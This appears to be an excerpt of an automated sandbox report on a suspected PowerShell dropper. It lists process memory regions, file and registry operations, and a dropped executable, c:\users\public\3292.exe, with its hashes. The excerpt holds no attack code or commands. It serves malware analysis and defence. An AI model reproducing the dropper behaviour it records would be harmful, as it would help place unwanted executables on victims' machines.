sorttbls.nlp 0x01f90000 0x01f94fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x01fa0000 0x01fa7fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000001fb0000 0x01fb0000 0x01fb0fff Pagefile Backed Memory Readable True False False
private_0x0000000001fc0000 0x01fc0000 0x0203ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002040000 0x02040000 0x02040fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000002040000 0x02040000 0x02050fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000002070000 0x02070000 0x020effff Private Memory Readable, Writable True True False
sortdefault.nls 0x020f0000 0x023befff Memory Mapped File Readable False False False
private_0x00000000023d0000 0x023d0000 0x0244ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000002450000 0x02450000 0x024cffff Private Memory Readable, Writable True True False
pagefile_0x00000000024d0000 0x024d0000 0x028c2fff Pagefile Backed Memory Readable True False False
private_0x00000000028d0000 0x028d0000 0x029cffff Private Memory Readable, Writable True True False
private_0x00000000029d0000 0x029d0000 0x02ad0fff Private Memory Readable, Writable True True False
private_0x0000000002ae0000 0x02ae0000 0x02aeffff Private Memory Readable, Writable True True False
private_0x0000000002af0000 0x02af0000 0x02afffff Private Memory Readable, Writable True True False
private_0x0000000002b00000 0x02b00000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002b10000 0x02b10000 0x02b8ffff Private Memory Readable, Writable True True False
private_0x0000000002b90000 0x02b90000 0x1ab8ffff Private Memory Readable, Writable True False False
private_0x000000001ab90000 0x1ab90000 0x1b25ffff Private Memory Readable, Writable True True False
private_0x000000001b260000 0x1b260000 0x1b2dffff Private Memory Readable, Writable True True False
system.management.automation.dll 0x1b2e0000 0x1b5c1fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll.mui 0x1b5d0000 0x1b68ffff Memory Mapped File Readable, Writable False False False
sortkey.nlp 0x1b690000 0x1b6d0fff Memory Mapped File Readable False False False
private_0x000000001b6e0000 0x1b6e0000 0x1b7dffff Private Memory Readable, Writable True True False
mscorrc.dll 0x1b7e0000 0x1b833fff Memory Mapped File Readable True False False
private_0x000000001b840000 0x1b840000 0x1b93ffff Private Memory Readable, Writable True True False
private_0x000000001bc40000 0x1bc40000 0x1bc4ffff Private Memory Readable, Writable True True False
private_0x000000001bc50000 0x1bc50000 0x1bc5ffff Private Memory Readable, Writable True True False
private_0x000000001bcf0000 0x1bcf0000 0x1c67ffff Private Memory Readable, Writable True True False
private_0x000000001c680000 0x1c680000 0x1c7fffff Private Memory Readable, Writable True True False
private_0x000000001c680000 0x1c680000 0x1c77ffff Private Memory Readable, Writable True True False
private_0x000000001c780000 0x1c780000 0x1c7fffff Private Memory Readable, Writable True True False
private_0x000000001c870000 0x1c870000 0x1c8effff Private Memory Readable, Writable True True False
private_0x000000001c910000 0x1c910000 0x1c98ffff Private Memory Readable, Writable True True False
private_0x000000001c9e0000 0x1c9e0000 0x1ca5ffff Private Memory Readable, Writable True True False
private_0x000000001ca70000 0x1ca70000 0x1caeffff Private Memory Readable, Writable True True False
private_0x000000001caf0000 0x1caf0000 0x1cceffff Private Memory Readable, Writable True True False
system.transactions.dll 0x1e230000 0x1e278fff Memory Mapped File Readable, Writable, Executable False False False
msvcr80.dll 0x74b00000 0x74bc8fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77260000 0x77266fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
powershell.exe 0x13f7a0000 0x13f816fff Memory Mapped File Readable, Writable, Executable False False False
culture.dll 0x642ff4a0000 0x642ff4a9fff Memory Mapped File Readable, Writable, Executable True False False
system.directoryservices.ni.dll 0x7fedf4b0000 0x7fedf644fff Memory Mapped File Readable, Writable, Executable True False False
system.management.ni.dll 0x7fedf650000 0x7fedf7bbfff Memory Mapped File Readable, Writable, Executable True False False
system.xml.ni.dll 0x7fedf7c0000 0x7fedfe64fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.management.ni.dll 0x7fedfe70000 0x7fedff87fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.utility.ni.dll 0x7fedff90000 0x7fee01a5fff Memory Mapped File Readable, Writable, Executable True False False
system.transactions.ni.dll 0x7fee01b0000 0x7fee0294fff Memory Mapped File Readable, Writable, Executable True False False
system.core.ni.dll 0x7fee02a0000 0x7fee05cdfff Memory Mapped File Readable, Writable, Executable True False False
system.management.automation.ni.dll 0x7fee05d0000 0x7fee112cfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.consolehost.ni.dll 0x7fee1130000 0x7fee11e1fff Memory Mapped File Readable, Writable, Executable True False False
system.ni.dll 0x7fee11f0000 0x7fee1c12fff Memory Mapped File Readable, Writable, Executable True False False
mscorlib.ni.dll 0x7fee1c20000 0x7fee2afbfff Memory Mapped File Readable, Writable, Executable True False False
mscorwks.dll 0x7fee2b00000 0x7fee349cfff Memory Mapped File Readable, Writable, Executable True False False
microsoft.wsman.management.ni.dll 0x7fee34e0000 0x7fee3589fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.security.ni.dll 0x7fee3870000 0x7fee38adfff Memory Mapped File Readable, Writable, Executable True False False
mscoreei.dll 0x7fee48c0000 0x7fee4958fff Memory Mapped File Readable, Writable, Executable True False False
microsoft.powershell.commands.diagnostics.ni.dll 0x7fee4960000 0x7fee49c8fff Memory Mapped File Readable, Writable, Executable True False False
mscoree.dll 0x7fef1100000 0x7fef116efff Memory Mapped File Readable, Writable, Executable True False False
system.configuration.install.ni.dll 0x7fef12c0000 0x7fef12f1fff Memory Mapped File Readable, Writable, Executable True False False
linkinfo.dll 0x7fef47a0000 0x7fef47abfff Memory Mapped File Readable, Writable, Executable False False False
shdocvw.dll 0x7fef47b0000 0x7fef47e3fff Memory Mapped File Readable, Writable, Executable False False False
shfolder.dll 0x7fef52a0000 0x7fef52a6fff Memory Mapped File Readable, Writable, Executable False False False
ntshrui.dll 0x7fef5ee0000 0x7fef5f5ffff Memory Mapped File Readable, Writable, Executable False False False
cscapi.dll 0x7fef5f60000 0x7fef5f6efff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x7fef7210000 0x7fef7266fff Memory Mapped File Readable, Writable, Executable False False False
slc.dll 0x7fefacd0000 0x7fefacdafff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x7fefad00000 0x7fefad18fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefb1b0000 0x7fefb1dcfff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb930000 0x7fefb985fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x7fefb990000 0x7fefbabbfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefbb10000 0x7fefbd03fff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc1a0000 0x7fefc1abfff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x7fefc380000 0x7fefc39dfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefc5d0000 0x7fefc616fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefc8d0000 0x7fefc8e6fff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x7fefcdd0000 0x7fefcdf2fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefced0000 0x7fefcedefff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefcfe0000 0x7fefcfeefff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x7fefd2e0000 0x7fefd315fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x7fefd390000 0x7fefd3a9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7fefd3b0000 0x7fefd48afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefd570000 0x7fefe2f7fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x7fefe630000 0x7fefe806fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe810000 0x7fefea12fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefeb50000 0x7fefebe8fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefed80000 0x7fefedf0fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff020000 0x7feff03efff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7feff090000 0x7feff1bcfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7feff1c0000 0x7feff296fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7feff2a0000 0x7feff2f1fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007ff00020000 0x7ff00020000 0x7ff0002ffff Private Memory - True True False
private_0x000007ff00030000 0x7ff00030000 0x7ff0003ffff Private Memory - True True False
private_0x000007ff00040000 0x7ff00040000 0x7ff000dffff Private Memory - True True False
private_0x000007ff000e0000 0x7ff000e0000 0x7ff000effff Private Memory - True True False
private_0x000007ff000f0000 0x7ff000f0000 0x7ff0015ffff Private Memory - True True False
private_0x000007ff00160000 0x7ff00160000 0x7ff0016ffff Private Memory - True True False
private_0x000007ff00170000 0x7ff00170000 0x7ff0017ffff Private Memory - True True False
private_0x000007ff00180000 0x7ff00180000 0x7ff0018ffff Private Memory - True True False
private_0x000007ff00190000 0x7ff00190000 0x7ff0019ffff Private Memory - True True False
private_0x000007ff001a0000 0x7ff001a0000 0x7ff001affff Private Memory - True True False
private_0x000007ff001b0000 0x7ff001b0000 0x7ff001bffff Private Memory - True True False
private_0x000007ff001c0000 0x7ff001c0000 0x7ff001cffff Private Memory - True True False
private_0x000007ff001d0000 0x7ff001d0000 0x7ff001dffff Private Memory - True True False
private_0x000007ff001e0000 0x7ff001e0000 0x7ff001effff Private Memory - True True False
private_0x000007ff001f0000 0x7ff001f0000 0x7ff001fffff Private Memory - True True False
private_0x000007ff00200000 0x7ff00200000 0x7ff0020ffff Private Memory - True True False
private_0x000007ff00210000 0x7ff00210000 0x7ff0021ffff Private Memory - True True False
private_0x000007ff00220000 0x7ff00220000 0x7ff0022ffff Private Memory - True True False
private_0x000007ff00230000 0x7ff00230000 0x7ff0023ffff Private Memory - True True False
private_0x000007ff00240000 0x7ff00240000 0x7ff0024ffff Private Memory - True True False
private_0x000007ff00250000 0x7ff00250000 0x7ff0025ffff Private Memory - True True False
private_0x000007ff00260000 0x7ff00260000 0x7ff0026ffff Private Memory - True True False
private_0x000007ff00270000 0x7ff00270000 0x7ff0027ffff Private Memory - True True False
private_0x000007ff00280000 0x7ff00280000 0x7ff0028ffff Private Memory - True True False
private_0x000007ff00290000 0x7ff00290000 0x7ff0029ffff Private Memory - True True False
private_0x000007fffff00000 0x7fffff00000 0x7fffff0ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffff10000 0x7fffff10000 0x7fffff9ffff Private Memory Readable, Writable, Executable True True False
private_0x000007fffffa4000 0x7fffffa4000 0x7fffffa5fff Private Memory Readable, Writable True True False
private_0x000007fffffa6000 0x7fffffa6000 0x7fffffa7fff Private Memory Readable, Writable True True False
private_0x000007fffffa8000 0x7fffffa8000 0x7fffffa9fff Private Memory Readable, Writable True True False
private_0x000007fffffaa000 0x7fffffaa000 0x7fffffabfff Private Memory Readable, Writable True True False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd4fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
For performance reasons, the remaining 35 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\public\3292.exe 120.00 KB (122880 bytes) MD5: ca6f2ee0e3b7218da76d126d22f707be
SHA1: a7fc89d6b45ce712c0be6600be4a8e6de9de434d
SHA256: b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4
False
Host Behavior
File (309)
+
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\3292.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 3
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 2
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 type = file_attributes False 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\Users\Public\3292.exe type = file_type True 2
Fn
Get Info C:\Users\Public\3292.exe type = file_attributes True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (211)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
